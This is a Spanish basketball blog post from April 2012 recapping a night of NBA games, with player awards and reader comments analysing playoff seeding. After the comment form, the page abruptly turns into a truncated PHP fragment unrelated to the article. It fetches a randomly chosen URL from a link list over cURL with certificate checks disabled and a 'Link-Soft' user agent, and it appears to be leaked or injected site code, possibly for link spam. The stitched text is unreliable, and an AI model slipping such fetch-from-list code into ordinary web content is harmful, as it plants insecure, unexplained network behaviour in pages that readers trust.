La Crónica: La lucha se mantiene en el Oeste

19 de April de 2012 por TheDeerHunter

Todo parece quedar visto para sentencia en el Este. Los Knicks no fallaron en el derbi ante Nets, con Melo en estado de gracia y unos Nets paladeando las vacaciones (104-95), y fueron los Sixers quienes anoche veían la luz, con una victoria fácil ante Cleveland (103-87) y, sobre todo, con el inesperado tropiezo de Bucks en la capital del reino (112-121). En uno de los más completos partidos de Wizards en esta digna recta final, impusieron lo que antaño fuera arma propia de los ciervos: solidez colectiva con hasta una decena de hombres produciendo a buen nivel.

En la parte alta del cuadro parece que veremos pocas variantes. Bulls y Heat consolidaron la primera y segunda plaza respectivamente destrozando sin miramientos a los pipiolos Bobcats (100-68) y Raptors (72-96), respectivamente, y eso que la mitad de los buenos se reservaban para mejores guerras. Más interesante estuvo el Magic@Celtics con victoria de los locales, quienes prácticamente se aseguran el campeonato de la división (98-102). Puede quedar en manos de los Hawks, que anoche ganaban en Detroit (84-116), decidir a quien desean de rival en primera ronda.

En el Oeste todo está algo más complicado. Dolorosa derrota de los Suns ante los Thunder (109-97), con un James Harden supremo, hincándole el diente al trofeo de mejor 6º hombre si no lo tenía ya asegurado. Nash y los suyos, sin embargo, se caen eventualmente de plazas de postemporada. Ni Spurs ni Lakers aflojan el paso, en dos duelos relativamente fáciles ante Kings (127-102) y Warriors (99-87) respectivamente. Por si acaso los Clippers mantienen la presión sobre el liderato de la división y obtuvieron una brillante victoria en Denver imponiendo juego colectivo (104-98). Eso es mucho decir ante el equipo George Karl. Los Grizzlies, por su parte, no se moverán de la 5ª plaza y esperan a uno de los dos LA. Anoche ganaban sin mayores problemas a los Hornets (91-103). El premio de la 3ª plaza no es baladí si es para evitar a los osos.

Los grandes beneficiados de la jornada fueron los Jazz, que se llevaron una victoria vital del Rose Garden y tocan con los dedos la clasificación (112-91). Inmenso Devin Harris como hacía tiempo que no le veíamos. Además los campeones les hacían el favor de derrotar a los Rockets (110-117) dándole valor doble a la victoria de Utah. Los Dallas Mavericks, por cierto, aún no están clasificados matemáticamente.

PREMIOS

MVP: Sólo ha jugado 2 partidos como titular esta temporada pero es pieza clave en el éxito de los Thunder. James Harden explotó definitivamente anoche con 40 puntos, 7 asistencias y 4 robos. Tras él, todo un conjunto de fueras de serie: Paul Pierce se puso en modo point-forward y repartió 14 asistencias además de anotar 29 puntos; Pau Gasol consiguió un triple-doble con 22 puntos, 11 rebotes y 11 asistencias con 3 tapones de propina; Carmelo Anthony se fue esta vez hasta los 33 puntos y 7 rebotes; Andrew Bynum consiguió 31 puntos y 9 rebotes; Dirk Nowitzki, 35 puntos, y Kevin Durant, 29 puntos, 11 rebotes y 5 asistencias. ¡Cómo se nota que ya llegan los Playoffs!

Rookie: Otro buen partido de la gran sorpresa de la temporada. Isaiah Thomas lideró a los suyos con 21 puntos y 8 asistencias.

Sorpresa: Tocó el partido bueno de Jordan Crawford. El de los Wizards anotó 32 puntos con un 11 de 17 en tiro. Por otro lado, buenas actuaciones de Sundiata Gaines (18 puntos, 6 rebotes y 6 asistencias) y Jerome Dyson (24 puntos). Hemos de reconocer que este último ni nos sonaba.

Decepción: Los partidos se pueden perder de muchas formas pero lo de los Charlotte Bobcats es intolerable. Tan solo fueron capaces de anotar 68 puntos en su décimooctava derrota seguida. 2ª partido consecutivo que no pasan de los 70 puntos. Deberían quitarles la mitad de papeletas del draft.

Esfuerzo en vano: No se puede decir que Monta Ellis no haya peleado por llevar a los Bucks a los Playoffs esta temporada. Anoche, volvió a irse de vacio a pesar de sus 31 puntos, 6 asistencias, 3 robos y 2 tapones.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Ru dice:
    #1

    Cositas de playoffs….

    …La 8ª plaza es cosa de medio partido entre Utah,Phoenix y Houston.Partidos que restan:

    UTAH: Orlando,Phoenix y Portland. Los 3 en casa.
    SUNS: Clippers,Denver,Utah(fuera) y San Antonio.
    HOUSTON: Hornets x2(fuea y en casa),Warriors y Miami(fuera).

    Rockets a pesar de su mala racha actual ganan 3 a esos equipos que buscan perder y pierden 1,el de Miami,se pondrían 35-31 y lamentandolo por encima de Suns que dudo que ganen 3 de esos 4.Y Utah lo tiene en su mano,ganarán a Portland pero Orlando es una incógnita y está el duelo directo frente a Phoenix,ganando uno más el desempate es suyo.

    Doy por seguro que OKC acaba 1º y SAS 2º,queda por decidir quien de los 2 angelinos es 3º y quién se lleva el premio de Memphis.Mientras que Dallas-Denver se la juegan para ver quién coge San Antonio y quién el otro equipo de Los Ángeles.

      Citar

  2. Sancho88 dice:
    #2

    A priori parece que lo tiene todo a favor Houston. Suns lo tiene muy muy jodido y los Jazz supongo que defenderán su ventaja de mdio partido sobre Rockets a cara de perro. El Suns@Jazz será decisivo. Realmente, Suns lo tiene muy jodido, Houston tiene que ganar todo y Jazz depende de sí mismos, ya que pienso que Suns perderá algo… Ahora mismo el favorito es Jazz, a mi juicio. Desde que Harris ha subido sus medias anotadoras, llevan una serie muy buena de resultados

      Citar

  3. GreenPride dice:
    #3

    Atención a los últimos partidos de Suns y Rockets contra equipos punteros pero que a lo mejor ese día ya no se juegan nada. Si San Antonio y Miami ya tiene la plaza asegurada para ese último partido es muy probable que reserven a los titulares de cara a playoffs y por tanto Suns y Rockets podrían obtener esas victorias con facilidad que en principio se cuenta como partidos muy difíciles para ellos. La mar de interesante se plantea el final de la regular.
    Y en el Este la cosa está caliente en los puestos 4, 5 y 6. Boston va a ganar la División así que será cuarto a efectos de cuadro pero se juega en estos últimos partidos si tendrá ventaja campo contra el quinto o no. En principio el quinto debería ser Atlanta (que en realidad es 4º pero sale Boston por ganar su división). Queda un Celtics en Atlanta en el que puede que se jueguen quién tendrá ventaja campo en la serie entre ellos aunque el calendario que queda para los 3 (Orlando es el otro) es durísimo,.
    Celtics (37-26): Atlanta (fuera), Miami y Milwaukee en casa.
    Hawks: Boston (37-25): New York, LA Clippers y Dallas todos en casa
    Magic (36-26): Utah (Fuera), Denver (Fuera), Charlotte y Memphis (Fuera)
    Dando a los Magic por ganado el partido con los Bobcats estarían empatados con los Celtics y a medio partido de Atlanta. Atlanta juega los 4 en casa pero son 4 partidos contra equipos muy difíciles y que se están jugando mucho todavía. Los Celtics deberían ganar seguro el último con Milwaukee y se la jugarán ante los Hawks y en casa ante Miami (veremos si Miami juega a tope o reserva gente). Los Magic creo que acabarán sextos porque tienen 3 partidos muy difíles fuera con equipos que todavía se juegan mucho aunque a lo mejor los Grizzlies en el último ya no se juegan nada.
    Veremos como queda, estos años parece que tendremos unos playoffs apasionantes ya que parecen más igualados que los últimos años.

      Citar

  4. GreenPride dice:
    #4

    Completo lo dicho del Este con la siguiente información:
    Para desempatar en caso de mismo record se usa:
    1) Record entre ellos
    2) Record contra equipos de la misma conferencia
    3) Record contra equipos de la misma conferencia clasificados para playoffs
    4) Record contra equipos de la otra conferencia clasificados para playoffs
    5) Difrencia de puntos
    Boston esta 2-1 a favor contra Atlanta y 3-0 contra Orlando por lo que si gana su partido con los Hawks tendría ventaja en caso de empate con ambos. En su conferencia está 30-15 por 30-16 de los Hawks y 29-18 de Orlando. Por tanto el Celtics-Hawks será super-decisivo para ver quién tendrá ventaja campo.

      Citar

  5. simon dice:
    #5

    Reconozco que he tenido que ir a la pagina de la nba para ver en que equipo jugaba Jerome Dyson es que ni sonarme el nombre!!!!! ni siquiera un poquito jejej…

    Creo que se meterán los Jazz, creo que van a ganar los 3.
    EN la cabeza del Oeste me decanto por los Spurs: Tienen un calendario mas accesible que Oklahoma, llevan una victoria mas, y el enfrentamiento particular ganan 2-1 por lo que en caso de empate se llevarian el 1º.
    Tienen 4 partidos faciles y de equipos que miran mas al Draft que a la temproada: CLE, POR ( en San Antonio ) y GSW ( fuera ), deberían ganar a LAL en casa y luego visitan PHO que puede ser el partido mas complicado.
    OKC tiene dos partidos faciles contra SAC ( en casa y fuera ) que deberían ganar y luego una dura visita a Lakers.
    Conclusión, si mañana los San Antonio ganan a Lakers creo que será casi definitivo porque le quedarían 4 partidos ( 3 muy faciles ) y encima se podrían permitir un tropiezo pq a igualdad ganan ellos.
    OKC: SAC, LAL ( Fuera ) SAC, DEN ( Casa )
    SAS: LAL, CLE, POR ( casa) , PHO, GSW, ( Fuera )

      Citar

  6. GreenPride dice:
    #6

    En el Oeste a parte de la lucha por entrar en PO está la lucha Lakers, Clippers por su división y sobre todo por evitar jugar con los Grizzlies la primera ronda. Lakers están 40-23, Clippers 39-23 y les queda lo siguiente
    Lakers: Spurs (Fuera), Thunder
    Clippers: Suns (Fuera), Hornets y Hawks (Fuera)
    Tremendo calendario para los Lakers contra los 2 primeros de la conferencia que además se están jugando quedar primeros entre ellos. Si el primer puesto queda decidido antes del último partido les ayudaría. Tampoco es fácil para los Clips jugando fuera con unos Suns en lucha por meterse en PO y contra Atlanta que anda jugandose la ventaja campo también fuera. Si suponemos que ganarán a los Hornets estarían empatados y dependería de 2 partidos por cada equipo. A los Lakers les vale con hacer el mismo record final que los Clippers pues en las series entre ellos ganan 2-1. Para el que quede delante se salva de jugar con los Grizzlies pero quedaría una serie nada apetecible tampoco contra los campeones Mavericks. Para el que quede detrás, serie a muerte contra Memphis

      Citar

  7. Esteban dice:
    #7

    GreenPride:
    En el Oeste a parte de la lucha por entrar en PO está la lucha Lakers, Clippers por su división y sobre todo por evitar jugar con los Grizzlies la primera ronda. Lakers están 40-23, Clippers 39-23 y les queda lo siguiente
    Lakers: Spurs (Fuera), Thunder
    Clippers: Suns (Fuera), Hornets y Hawks (Fuera)
    Tremendo calendario para los Lakers contra los 2 primeros de la conferencia que además se están jugando quedar primeros entre ellos. Si el primer puesto queda decidido antes del último partido les ayudaría. Tampoco es fácil para los Clips jugando fuera con unos Suns en lucha por meterse en PO y contra Atlanta que anda jugandose la ventaja campo también fuera. Si suponemos que ganarán a los Hornets estarían empatados y dependería de 2 partidos por cada equipo. A los Lakers les vale con hacer el mismo record final que los Clippers pues en las series entre ellos ganan 2-1. Para el que quede delante se salva de jugar con los Grizzlies pero quedaría una serie nada apetecible tampoco contra los campeones Mavericks. Para el que quede detrás, serie a muerte contra Memphis

    a juzgar por el calendario, los clippers quedarian terceros y enfrentarian a denver y los lakers a menphis

    no veo hoy a los lakers venciendo a spurs o thunder a menos q tiren los partidos
    por el contrario veo a los clippers ganando a hornets y suns, e incluso a hawks

      Citar

  8. Jose Luis dice:
    #8

    @Greenpride

    A los Lakers también le queda visitar Sacramento en la última jornada, lo cual es una victoria fácil probablemente, y los Clippers tienen que ir a New York. Creo que no bajaste del todo en la página de scores & schedules de nba.com 😛

      Citar

  9. GreenPride dice:
    #9

    Es verdad Jose Luis, perdonad, me salté un partido por equipo.
    Anoche los Clippers la pifiaron en Phoenix y como el empate le vale a los Lakers con ganar a Sacramento y uno de los dos partidos fuertes ya serían terceros. Eso o que los Clippers pierdan otro de sus partidos.
    Creo que los Lakers van a acabar terceros y tendremos eliminatoria revancha del año pasado contra Dallas y un interesantísimo Clippers-Memphis en primera ronda.

      Citar

  10. Jose Luis dice:
    #10

    No pasa nada GreenPride, el que tiene boca se equivoca, hiciste un gran análisis y es por él que estoy más enterado de como está la cosa. De hecho, creo que te lo han copiado para el Marca de hoy jajajaja, malditos.

    PD: ¿No serás Pau Martorell no? jajajaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>